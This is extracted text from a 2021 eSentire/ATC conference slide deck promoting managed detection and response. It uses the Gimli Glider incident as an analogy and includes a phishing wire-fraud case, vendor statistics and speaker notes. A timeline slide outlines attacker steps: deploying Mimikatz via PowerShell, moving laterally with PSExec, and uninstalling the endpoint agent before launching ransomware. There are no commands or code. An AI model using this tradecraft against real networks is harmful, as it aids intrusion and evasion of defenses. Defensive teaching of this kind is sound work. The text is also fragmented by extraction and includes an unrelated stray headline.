Given an outcome, we often exaggerate our ability to predict and therefore avoid the same fate. In cybersecurity, this misconception can lead to a false sense of corporate security, or worse, bury the true causes of incidents and lead to repeated data breaches or business-disrupting cyber incidents.
Top 10 Most Downloaded Games on Play Store in 2024
Building Cyber Resilience: No Safe Harbor
1. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
Building Cyber Resilience:
No Safe Harbor
OISC 10 Mar 2021
Mark Sangster
Principal Evangelist and VP
Industry Security Strategies
eSentire
Nick Enger
CTO
ATC
Louie Hollmeyer
Director
ATC
2. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
Building Cyber Resilience:
No Safe Harbor
ATC & eSentire
• Independent IT Consulting
• Digital Transformation (DX) in Four Core Segments:
o Voice | Network | Cloud | Cybersecurity
• Solution Agnostic
• 400+ Technology Providers
• Founded 2001
• Category Creator
• World’s Largest MDR Company
*Attendees will receive a copy of Mark’s book, “No Safe Harbor.” We will also
be raffling off Amazon gift cards to attendees and booth visitors.
**Mark will be in the ATC-eSentire booth directly following this presentation.
3. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
eSentire CONFIDENTIAL
eSentire Managed Detection and Response
2001
Year founded
750+
Customers across
48 countries
97%
Customer retention rate
$6 Trillion+
90%
year-over-year growth
2.6 Billion+
indicators of concern ingested
in 2019
S E A T T L E
W A T E R L O O
N E W Y O R K
C O R K
L O N D O N
In assets under protection
4. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
IOC
D E T E C T I O N
INCIDENT
D E T E C T I O N
THREAT
A N A LY S I S
INCIDENT
I N V E S T I G AT I O N
THREAT
C O N TA I N M E N T
DISRUPT
C O N TA I N
THREAT
H U N T I N G
24/7
M O N I T O R I N G
24/7
3 6 0 - D E G R E E S
2 0 M I N
TO CONTAINMENT
3 5 S E C
TO TRIAGE
T H R E A T
H U N T I N G
A N D
R E S P O N S E
M A C I N E
L E A R N I N G
H U M A N
E X P E R T I S E
eSentire Managed Detection and Response
NORTH-SOUTH
N E T W O R K
EAST-WEST
E N D P O I N T S
IAAS + SAAS
C L O U D
SYSTEM
L O G S
THREAT
I N T E L L I G E N C E
DATA
A N A LY T I C S
SOC
P O R TA L
AT L A S
C L O U D - N A T I V E
S O A R
7. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
On July 23 1983, Air Canada 143 was a passenger flight between Montreal and Edmonton. Midway
through the flight at an altitude of 41,000 feet, the plane ran out of fuel.
8. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
On July 23 1983, Air Canada 143 was a passenger flight between Montreal and Edmonton. Midway
through the flight at an altitude of 41,000 feet, the plane ran out of fuel.
The crew was able to glide the Boeing 767 aircraft safely to an emergency landing at a former Air
Force base in Gimli, Manitoba. There were only minor injuries. This unusual aviation incident earned
the aircraft the nickname "Gimli Glider.”
9. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
Initially hailed as heroes, following the airline’s internal investigation, Captain Pearson
was demoted for six months and First Officer Quintal was suspended for two weeks for
allowing the incident to happen. Three maintenance workers were also suspended.
10. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
R E G U L AT O R Y
CHANGES
M E C H A N I C A L
FAILURES
N O V E L
TECHNOLOGY
H U M A N
ERROR
11. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
E M E R G I N G
T E C H N O L O G Y
G L A S S C O C K P I T
F L Y - B Y - W I R E
T W O P I L O T S
R E D U C E D C R E W
N O V E L
A I R C R A F T D E S I G N
S A F E T Y
T H R E A T S
H U M A N E R R O R S
M I S C A L C U L A T I O N S
O B S O L E T E
G O V E R N A N C E
M E C H A N I C A L
F A I L U R E S
A C C O U N T A B I L I T Y
F A A + N T S B
R E G U L A T O R Y C H A N G E S
12. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
A C C O U N T A B I L I T Y
C O M P L I A N C E + C O N T R A C T S + C O V E R A G E
S O P H I S T I C A T E D
T H R E A T S
M A L W A R E
A S - A - S E R V I C E
H A N D S - O N
K E Y B O A R D
C U L T U R A L
E N G I N E E R I N G
E M E R G I N G
T E C H N O L O G Y
A C C E S S
R E M O T E W O R K E R S
A S S E T S
C L O U D - B A S E S
W O R K L O A D S
D I S T R I B U T E D
13. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
Cyber accountability is growing
Reasonable care, attorney-client privilege and discovery, and ransom payment violations
14. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
U S I N G Y O U R O W N T O O L S
HAND -O N-KEYB OARD
1
F 5 0 0 B U S I N E S S P R A C T I C E S
MALWARE A S - A - S E R V I C E
2
T H E Y U N D E R S TA N D Y O U R B U S I N E S S
CULT URE -BASED AT TACKS
3
STATE-SPONSORED actors move down stream
while ORGANIZED CRIME grows in ferocity and coordination
15. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
Business Email Compromise (BES)
Fraudulent Transfers of Funds (FTF)
On April 1, 2018, the CFO of a firm received a phishing
email, which redirected him to a site designed to look like
a legitimate Microsoft Office365 login page. The CFO
unknowingly entered his login credentials.
They accessed the CFO's Office365 account 464 times
between April 6 and 20, 2018. They sent fraudulent wire
transfer requests from the account to the financial team.
To hide their activities from the CFO, the conspirators
created used email rules to mark messages read and move
them to another folder.
The finance team at Unatrac processed 15 payments to
overseas accounts, totaling almost $11 million, most of
which could not be recovered.
16. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
Standing your ground against cyberattacks
C O U N T E R I R
82%
C U S T O M
M A L W A R E
50%
When you turn the lights on an adversary, assume an escalation
Ransomware-as-a-service lowers the entry barriers
for prospective cybercrime entrepreneurs, it has
the very real potential to increase the “supply” of
ransomware operators.
Vmware Carbon Black: Custom malware is now being used in 50 percent of the attacks
reported by respondents demonstrating the scale of the dark web, where such
malware and malware services can be purchased to empower traditional criminals,
spies and terrorists, many of whom do not have the sophisticated resources to execute
these attacks.
CrowdStrike: PINCHY SPIDER pioneered the RaaS model of operations, in which the
developer receives a share of the profits that affiliates collect from successful
ransomware infections. Beginning in February 2019, this adversary advertised its
intention to partner with individuals skilled in RDP/VNC networks and with spammers
who have experience in corporate networking.
17. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
Complex and persistent campaigns to create a major security event and seven-figure ransoms
This is how phishing and cyber campaigns actually work
N E G O T I A T E D R A N S O M
OPERATIONAL DISRUPTION
E X T O R T I O N P A Y M E N T
PUBLIC EXPOSURE
R E S A L E R E V E N U E
DATA BREACH
INFILTRATION
DATA
EXFILTRATION
HARVEST
CREDENTIALS
ACCESS
VIA VPN
VIA
RAT/RDP
VALIDATING
ACCOUNTS
18. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
They understand your business
Exploiting industry culture to mimic trusted actors
19. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
44% Experienced a third-party material breach
32% Lack resources to audit third parties
15% Were notified by the third party responsible
Supply chain cyber risks
Three Ps of 3rd-Party Risk: Policies, Prevention and Promises
20. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
Macro
Events
Trusted
Sources
Industry
Influences
Social
Engineering
Target Intelligence
Tailored Campaign
Hijacked Docs
Cloned Email
Chimera Sites
Client Identities
Hijacked
Credentials
Endpoint
Via RDP
1 VPN
Creates
Account-B
Powershell Deploy
Mimikatz
Never assume a cyber singularity
Adversaries use ecosystem experts to island hop and disable defenses
Endpoint
Via RDP
2
VPN
Creates
Account-C
PSExec SunCrypt
Ransomware
Endpoint
Via RDP
Endpoint
Uninstall EDR
3
VPN
Creates
Account-D
Revo
Netwalker
Ransomware
CLIENT
Credentials
VENDOR
Credentials
21. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
A C O U N T A B I L I T Y
Can you see your
entire environment?
How do you manage
cybersecurity expenses?
How do you fill
expertise gaps?
How do you scale to
handle the data volume?
How quickly can you
respond to threats?
What is your cyber risk?
What are your obligations?
22. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
MDR services offer turnkey threat detection and response via
modern, remotely delivered, 24/7 security operations center
capabilities and technology.
M D R e v o l v e d f r o m M S S P
E x t e r n a l S O C o r a u g m e n t s
i n t e r n a l c a p a b i l i t i e s
M D R l a c k s a c l e a r s e r v i c e
d e f i n i t i o n a c r o s s v e n d o r s
D i f f e r e n t i a t i o n i s d i f f i c u l t
a c r o s s v a r i e d a p p r o a c h e s
23. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
EXPERT-DRIVEN
INVESTIGATION
Expert threat
analysis
Investigation and
confirmation
AUTOMATED
ANALYSIS
Machine
speed and scale
Aggregation
and correlation
ATLAS CLOUD SOAR
Automation | Orchestration | Response
FULL SPECTRUM DETECTION
E N D P O I N T S N E T W O R K
C L O U D L O G S
I N S I D E R A S S E T S
D I G I TA L T R A N S F O R M AT I O N L E A D S TO A L A C K O F V I S I B I L I T Y
How do you cover the entire threat surface?
1
E X P E R T
P E O P L E
M A C H I N E
L E A R N I N G
CONTAINMENT
CONFIRMED
IMMEDIATE
UNLIMITED
SURGICAL
DOCUMENTED
24. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
EXPERT-DRIVEN
INVESTIGATION
Expert threat
analysis
Investigation and
confirmation
AUTOMATED
ANALYSIS
Machine
speed and scale
Aggregation
and correlation
ATLAS CLOUD SOAR
Automation | Orchestration | Response
FULL SPECTRUM DETECTION
E N D P O I N T S N E T W O R K
C L O U D L O G S
I N S I D E R A S S E T S
E X P E R T
P E O P L E
M A C H I N E
L E A R N I N G
CONTAINMENT
CONFIRMED
IMMEDIATE
UNLIMITED
SURGICAL
DOCUMENTED
2
A N AVA L A N C H E O F FA L S E P O S I T I V E S L E A D S TO A L E R T OV E R LOA D
How do you prioritize investigation?
25. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
R E D U C I N G D W E L L T I M E I S C R I T I C A L
How quickly can you respond to threats?
FULL SPECTRUM DETECTION
E N D P O I N T S N E T W O R K
C L O U D L O G S
I N S I D E R A S S E T S
3
E X P E R T
P E O P L E
M A C H I N E
L E A R N I N G
CONTAINMENT
35
seconds
to begin triage
6
Investigations every minute
20
minutes
to containment
646
Confirmed incidents per day
ONE MONTH OF CUSTOMER DATA
271,812
indicators of concern
2,190
investigations
65
security incidents
2
escalations
200
endpoints
200
employees
26. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
4
R E C R U I T I N G , R E TA I N I N G A N D R E T R A I N I N G
How do you overcome the
cybersecurity skills gap?
E S TA B L I S H E D TA L E NT P I P E L I N E
Maintain access to cybersecurity professionals despite the global shortage
TA K E C A R E O F YO U R S O C A N A LYS TS
Prevent burnout which is the number one problem
E S TA B L I S H Q UA L I T Y A S S U R A N C E
Ensuring customers receive the best possible service
I N V ES T I N TO O L S + T E C H N O LO GY
Continually improve operational effectiveness, efficiency and human-machine
collaboration in the face of ever-increasing threat signals
P R OV I D E C O N T I N UO U S E D U C AT I O N
Support SOC analysts to level-up with new skills and credentials through
continuous education and certification
P R OV I D E C A R E E R A D VA N C E MEN T
Support SOC analysts’ advancement in the SOC, threat analytics or other areas of the organization
28. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
Step 0
Unknown IP Connects
via VPN to Endpoint-0
Step 1
Compromised Account-A
access Endpoint-0 via RDP
Step 2
Creates Account-B and
connects to System-0 via
RDP
Step 3
Account-B deploys
Mimikatz via PowerShell
on Endpoint-0
INFECTION
Sunwalker: pervasive and persistent attacks
Step 4
Detection rule
triggered in Carbon
Black Endpoint agent
CONTAINMENT
Step 5
eSentire SOC isolates
Endpoint-0 and
generate alert
Step 6
eSentire Threat Response
Unit initiates broader
investigation and worked
with client
DETECTION
LATERAL
ATTACK
Step 7
Attacker uses Endpoint -2
To deploy SunCrypt
ransomware using PSExec
CONTAINMENT
Step 8
Lateral spread attempt is
automatically blocked by
Carbon Black Endpoint
Step 10
Attacker uses
Account-D to
access Domain
Controller
COUNTER
ATTACK
Step 9
Attacker downloads
Revo Uninstaller to
remove Carbon Black
Step 11
Attacker attempts to
execute Netwalker
ransomware on
Endpoint-2
CONTAINMENT
Step 12
Carbon Black Endpoint
attempts at lateral infection
via PSExec
Step 13
Carbon Black Endpoint blocks
attempt to detonate
Netwalker
Step 14
eSentire SOC Isolates
Endpoint-2
CO-REMEDIATION
Step 15
eSentire SOC
Alerts and makes
recommendations
29. Start date: mm.dd.yyyy
End date: mm.dd.yyyy
A C O U N T A B I L I T Y
360° VISIBILITY
Detection and Response
COST EFFECTIVE
Security for the Midmarket
SECURITY EXPERTISE
150+ SOC+TI Analysts
RAPID + SCALABLE
Alert processing
20 MINUTES
Average Time to Resolution
RISK MANAGEMENT
CSO Resources on Call
Ghandi, Buddha or even Dante author of the Divine Comedy.
Kidding. It’s from Fight Club.
Fictitious character
Unbeknownst to Pearson, Quintal, and the helpless air traffic controllers, the intended runway now served the Winnipeg Sports Car Club, as a multifunction auto racing facility. Much of the 6,800-foot runway had a steel guardrail running down the middle of it to create a two-lane dragstrip. The day of the incident, the racing club was hosting a family event with cars racing on the now decommissioned runway. Race cars and campers surrounded the runway, as children and families enjoyed their festivities on a beautiful summer day.
Seventeen minutes after running out of fuel, Air Canada Flight 143 came to final rest, mere yards from the racing cars and the event’s participants. The sixty-one passengers, eight crew members and the families on the ground were spared a horrific tragedy.
The sixty-one passengers, eight crew members, and hundreds of people attending the event survived.
Conversion from Imperial to Metric systems
Pilots and ground crew with little training made mistakes when calculating fuel requirements
The FQIS was not functioning (pilots were told): a known issue on the 767
Ran Dip-stick physical check on fuel load
Digital cockpit had a flight computer that could validate fuel loads and flight plans
Two pilots not three (the third was in charge of fueling)
New aircraft: assumed computer wasn’t working
MARK
Work through threat reports:
Organized crime
Hands on keyboard
Cultural engineering
escribe the danger of Hand-on-keyboard and living-off-the-land attacks.
MARK
Tease the State Supreme Court attack and foreshadow Tia going into greater depth.
KEEGAN will take this slide
Illustrates both VMware CB and eSentire’s capabilities and why it’s important to have both
NOTE: Change CB Defense to CB Endpoint in the report